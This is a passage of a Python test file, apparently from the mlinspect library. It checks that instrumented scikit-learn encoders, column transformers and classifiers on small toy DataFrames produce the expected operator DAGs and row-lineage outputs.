expected_lineage_df = DataFrame([[numpy.array(['cat_a']), {LineageId(0, 0)}],
[numpy.array(['cat_a']), {LineageId(0, 1)}],
[numpy.array(['cat_a']), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_one_hot_encoder_not_sparse():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._encoders', 'OneHotEncoder') with dense output
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, OneHotEncoder
import numpy as np
df = pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
one_hot_encoder = OneHotEncoder(sparse=False)
encoded_data = one_hot_encoder.fit_transform(df)
expected = np.array([[1., 0., 0.], [0., 1., 0.], [1., 0., 0.], [0., 0., 1.]])
print(encoded_data)
assert np.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 62),
"pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(6, 18, 6, 45), 'OneHotEncoder(sparse=False)'))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_one_hot_encoder_sparse():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._encoders', 'OneHotEncoder') works for sparse output
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, OneHotEncoder
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
one_hot_encoder = OneHotEncoder()
encoded_data = one_hot_encoder.fit_transform(df)
expected = csr_matrix([[1., 0., 0.], [0., 1., 0.], [1., 0., 0.], [0., 0., 1.]])
assert numpy.allclose(encoded_data.A, expected.A) and isinstance(encoded_data, csr_matrix)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(6, 5, 6, 62),
"pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(7, 18, 7, 33), 'OneHotEncoder()'))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_column_transformer_one_transformer():
"""
Tests whether the monkey patching of ('sklearn.compose._column_transformer', 'ColumnTransformer') works with
one transformer
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler
from sklearn.compose import ColumnTransformer
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': [1, 2, 10, 5], 'B': [1, 2, 10, 5]})
column_transformer = ColumnTransformer(transformers=[
('numeric', StandardScaler(), ['A', 'B'])
])
encoded_data = column_transformer.fit_transform(df)
expected = numpy.array([[-1.], [-0.71428571], [1.57142857], [0.14285714]])
assert numpy.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, columns=['A', 'B']),
OptionalCodeInfo(CodeReference(7, 5, 7, 59),
"pd.DataFrame({'A': [1, 2, 10, 5], 'B': [1, 2, 10, 5]})"))
expected_projection = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(8, 21, 10, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A', 'B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection)
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(9, 16, 9, 32), 'StandardScaler()'))
expected_dag.add_edge(expected_projection, expected_standard_scaler)
expected_concat = DagNode(3,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.CONCATENATION,
FunctionInfo('sklearn.compose._column_transformer', 'ColumnTransformer')),
DagNodeDetails(None, ['array']),
OptionalCodeInfo(CodeReference(8, 21, 10, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A', 'B'])\n])"))
expected_dag.add_edge(expected_standard_scaler, expected_concat)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[1, 1, {LineageId(0, 0)}],
[2, 2, {LineageId(0, 1)}],
[10, 10, {LineageId(0, 2)}]],
columns=['A', 'B', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_standard_scaler]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0, -1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, -0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_concat]
lineage_output = inspection_results_data_source[RowLineage(3)]
# TODO: Lineage concat
expected_lineage_df = DataFrame([[numpy.array([-1.0, -1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, -0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_column_transformer_multiple_transformers_all_dense():
"""
Tests whether the monkey patching of ('sklearn.compose._column_transformer', 'ColumnTransformer') works with
multiple transformers with dense output
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': [1, 2, 10, 5], 'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
column_transformer = ColumnTransformer(transformers=[
('numeric', StandardScaler(), ['A']),
('categorical', OneHotEncoder(sparse=False), ['B'])
])
encoded_data = column_transformer.fit_transform(df)
expected = numpy.array([[-1., 1., 0., 0.], [-0.71428571, 0., 1., 0.], [ 1.57142857, 1., 0., 0.],
[0.14285714, 0., 0., 1.]])
print(encoded_data)
assert numpy.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B']),
OptionalCodeInfo(CodeReference(7, 5, 7, 82),
"pd.DataFrame({'A': [1, 2, 10, 5], "
"'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_projection_1 = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['A']", ['A']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=False), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_1)
expected_projection_2 = DagNode(3,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['B']", ['B']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=False), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_2)
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(9, 16, 9, 32), 'StandardScaler()'))
expected_dag.add_edge(expected_projection_1, expected_standard_scaler)
expected_one_hot = DagNode(4,
BasicCodeLocation("<string-source>", 10),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(10, 20, 10, 47), 'OneHotEncoder(sparse=False)'))
expected_dag.add_edge(expected_projection_2, expected_one_hot)
expected_concat = DagNode(5,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.CONCATENATION,
FunctionInfo('sklearn.compose._column_transformer', 'ColumnTransformer')),
DagNodeDetails(None, ['array']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=False), ['B'])\n])"))
expected_dag.add_edge(expected_standard_scaler, expected_concat)
expected_dag.add_edge(expected_one_hot, expected_concat)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_1]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[1, {LineageId(0, 0)}],
[2, {LineageId(0, 1)}],
[10, {LineageId(0, 2)}]],
columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_2]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([['cat_a', {LineageId(0, 0)}],
['cat_b', {LineageId(0, 1)}],
['cat_a', {LineageId(0, 2)}]],
columns=['B', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_standard_scaler]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_one_hot]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_concat]
lineage_output = inspection_results_data_source[RowLineage(3)]
# TODO: Lineage concat
expected_lineage_df = DataFrame([[numpy.array([-1.0, 1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, 0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_column_transformer_multiple_transformers_sparse_dense():
"""
Tests whether the monkey patching of ('sklearn.compose._column_transformer', 'ColumnTransformer') works with
multiple transformers with sparse and dense mixed output """
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': [1, 2, 10, 5], 'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
column_transformer = ColumnTransformer(transformers=[
('numeric', StandardScaler(), ['A']),
('categorical', OneHotEncoder(sparse=True), ['B'])
])
encoded_data = column_transformer.fit_transform(df)
expected = numpy.array([[-1., 1., 0., 0.], [-0.71428571, 0., 1., 0.], [ 1.57142857, 1., 0., 0.],
[0.14285714, 0., 0., 1.]])
print(encoded_data)
assert numpy.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B']),
OptionalCodeInfo(CodeReference(7, 5, 7, 82),
"pd.DataFrame({'A': [1, 2, 10, 5], "
"'B': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_projection_1 = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['A']", ['A']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=True), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_1)
expected_projection_2 = DagNode(3,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('sklearn.compose._column_transformer',
'ColumnTransformer')),
DagNodeDetails("to ['B']", ['B']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=True), ['B'])\n])"))
expected_dag.add_edge(expected_data_source, expected_projection_2)
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(9, 16, 9, 32), 'StandardScaler()'))
expected_dag.add_edge(expected_projection_1, expected_standard_scaler)
expected_one_hot = DagNode(4,
BasicCodeLocation("<string-source>", 10),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(10, 20, 10, 46), 'OneHotEncoder(sparse=True)'))
expected_dag.add_edge(expected_projection_2, expected_one_hot)
expected_concat = DagNode(5,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.CONCATENATION,
FunctionInfo('sklearn.compose._column_transformer', 'ColumnTransformer')),
DagNodeDetails(None, ['array']),
OptionalCodeInfo(CodeReference(8, 21, 11, 2),
"ColumnTransformer(transformers=[\n"
" ('numeric', StandardScaler(), ['A']),\n"
" ('categorical', OneHotEncoder(sparse=True), ['B'])\n])"))
expected_dag.add_edge(expected_standard_scaler, expected_concat)
expected_dag.add_edge(expected_one_hot, expected_concat)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_1]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[1, {LineageId(0, 0)}],
[2, {LineageId(0, 1)}],
[10, {LineageId(0, 2)}]],
columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_projection_2]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([['cat_a', {LineageId(0, 0)}],
['cat_b', {LineageId(0, 1)}],
['cat_a', {LineageId(0, 2)}]],
columns=['B', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_standard_scaler]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_one_hot]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_concat]
lineage_output = inspection_results_data_source[RowLineage(3)]
# TODO: Lineage concat
expected_lineage_df = DataFrame([[numpy.array([-1.0, 1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143, 0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714, 1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_decision_tree():
"""
Tests whether the monkey patching of ('sklearn.tree._classes', 'DecisionTreeClassifier') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler
from sklearn.tree import DecisionTreeClassifier
import numpy as np
df = pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], 'target': ['no', 'no', 'yes', 'yes']})
train = StandardScaler().fit_transform(df[['A', 'B']])
target = label_binarize(df['target'], classes=['no', 'yes'])
clf = DecisionTreeClassifier()
clf = clf.fit(train, target)
test_predict = clf.predict([[0., 0.], [0.6, 0.6]])
expected = np.array([0., 1.])
assert np.allclose(test_predict, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B', 'target']),
OptionalCodeInfo(CodeReference(6, 5, 6, 95),
"pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], "
"'target': ['no', 'no', 'yes', 'yes']})"))
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(8, 8, 8, 24), 'StandardScaler()'))
expected_data_projection = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(8, 39, 8, 53), "df[['A', 'B']]"))
expected_dag.add_edge(expected_data_source, expected_data_projection)
expected_dag.add_edge(expected_data_projection, expected_standard_scaler)
expected_label_projection = DagNode(3,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['target']", ['target']),
OptionalCodeInfo(CodeReference(9, 24, 9, 36), "df['target']"))
expected_dag.add_edge(expected_data_source, expected_label_projection)
expected_label_encode = DagNode(4,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION_MODIFY,
FunctionInfo('sklearn.preprocessing._label', 'label_binarize')),
DagNodeDetails("label_binarize, classes: ['no', 'yes']", ['array']),
OptionalCodeInfo(CodeReference(9, 9, 9, 60),
"label_binarize(df['target'], classes=['no', 'yes'])"))
expected_dag.add_edge(expected_label_projection, expected_label_encode)
expected_train_data = DagNode(5,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_DATA,
FunctionInfo('sklearn.tree._classes', 'DecisionTreeClassifier')),
DagNodeDetails('Train Data', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 30), 'DecisionTreeClassifier()'))
expected_dag.add_edge(expected_standard_scaler, expected_train_data)
expected_train_labels = DagNode(6,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_LABELS,
FunctionInfo('sklearn.tree._classes', 'DecisionTreeClassifier')),
DagNodeDetails('Train Labels', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 30), 'DecisionTreeClassifier()'))
expected_dag.add_edge(expected_label_encode, expected_train_labels)
expected_decision_tree = DagNode(7,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.ESTIMATOR,
FunctionInfo('sklearn.tree._classes', 'DecisionTreeClassifier')),
DagNodeDetails('Decision Tree', []),
OptionalCodeInfo(CodeReference(11, 6, 11, 30), 'DecisionTreeClassifier()'))
expected_dag.add_edge(expected_train_data, expected_decision_tree)
expected_dag.add_edge(expected_train_labels, expected_decision_tree)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_data]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.3416407864998738, -1.3416407864998738]), {LineageId(0, 0)}],
[numpy.array([-0.4472135954999579, -0.4472135954999579]), {LineageId(0, 1)}],
[numpy.array([0.4472135954999579, 0.4472135954999579]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_labels]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([0]), {LineageId(0, 0)}],
[numpy.array([0]), {LineageId(0, 1)}],
[numpy.array([1]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_decision_tree]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[{LineageId(0, 0)}],
[{LineageId(0, 1)}],
[{LineageId(0, 2)}]],
columns=['mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True),
check_column_type=False)
def test_logistic_regression():
"""
Tests whether the monkey patching of ('sklearn.linear_model._logistic', 'LogisticRegression') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, StandardScaler
from sklearn.linear_model import LogisticRegression
import numpy as np
df = pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], 'target': ['no', 'no', 'yes', 'yes']})
train = StandardScaler().fit_transform(df[['A', 'B']])
target = label_binarize(df['target'], classes=['no', 'yes'])
clf = LogisticRegression()
clf = clf.fit(train, target)
test_predict = clf.predict([[0., 0.], [0.6, 0.6]])
expected = np.array([0., 1.])
assert np.allclose(test_predict, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B', 'target']),
OptionalCodeInfo(CodeReference(6, 5, 6, 95),
"pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], "
"'target': ['no', 'no', 'yes', 'yes']})"))
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(8, 8, 8, 24), 'StandardScaler()'))
expected_data_projection = DagNode(1,
BasicCodeLocation("<string-source>", 8),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(8, 39, 8, 53), "df[['A', 'B']]"))
expected_dag.add_edge(expected_data_source, expected_data_projection)
expected_dag.add_edge(expected_data_projection, expected_standard_scaler)
expected_label_projection = DagNode(3,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['target']", ['target']),
OptionalCodeInfo(CodeReference(9, 24, 9, 36), "df['target']"))
expected_dag.add_edge(expected_data_source, expected_label_projection)
expected_label_encode = DagNode(4,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.PROJECTION_MODIFY,
FunctionInfo('sklearn.preprocessing._label', 'label_binarize')),
DagNodeDetails("label_binarize, classes: ['no', 'yes']", ['array']),
OptionalCodeInfo(CodeReference(9, 9, 9, 60),
"label_binarize(df['target'], classes=['no', 'yes'])"))
expected_dag.add_edge(expected_label_projection, expected_label_encode)
expected_train_data = DagNode(5,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_DATA,
FunctionInfo('sklearn.linear_model._logistic', 'LogisticRegression')),
DagNodeDetails('Train Data', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 26), 'LogisticRegression()'))
expected_dag.add_edge(expected_standard_scaler, expected_train_data)
expected_train_labels = DagNode(6,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRAIN_LABELS,
FunctionInfo('sklearn.linear_model._logistic',
'LogisticRegression')),
DagNodeDetails('Train Labels', ['array']),
OptionalCodeInfo(CodeReference(11, 6, 11, 26), 'LogisticRegression()'))
expected_dag.add_edge(expected_label_encode, expected_train_labels)
expected_estimator = DagNode(7,
BasicCodeLocation("<string-source>", 11),
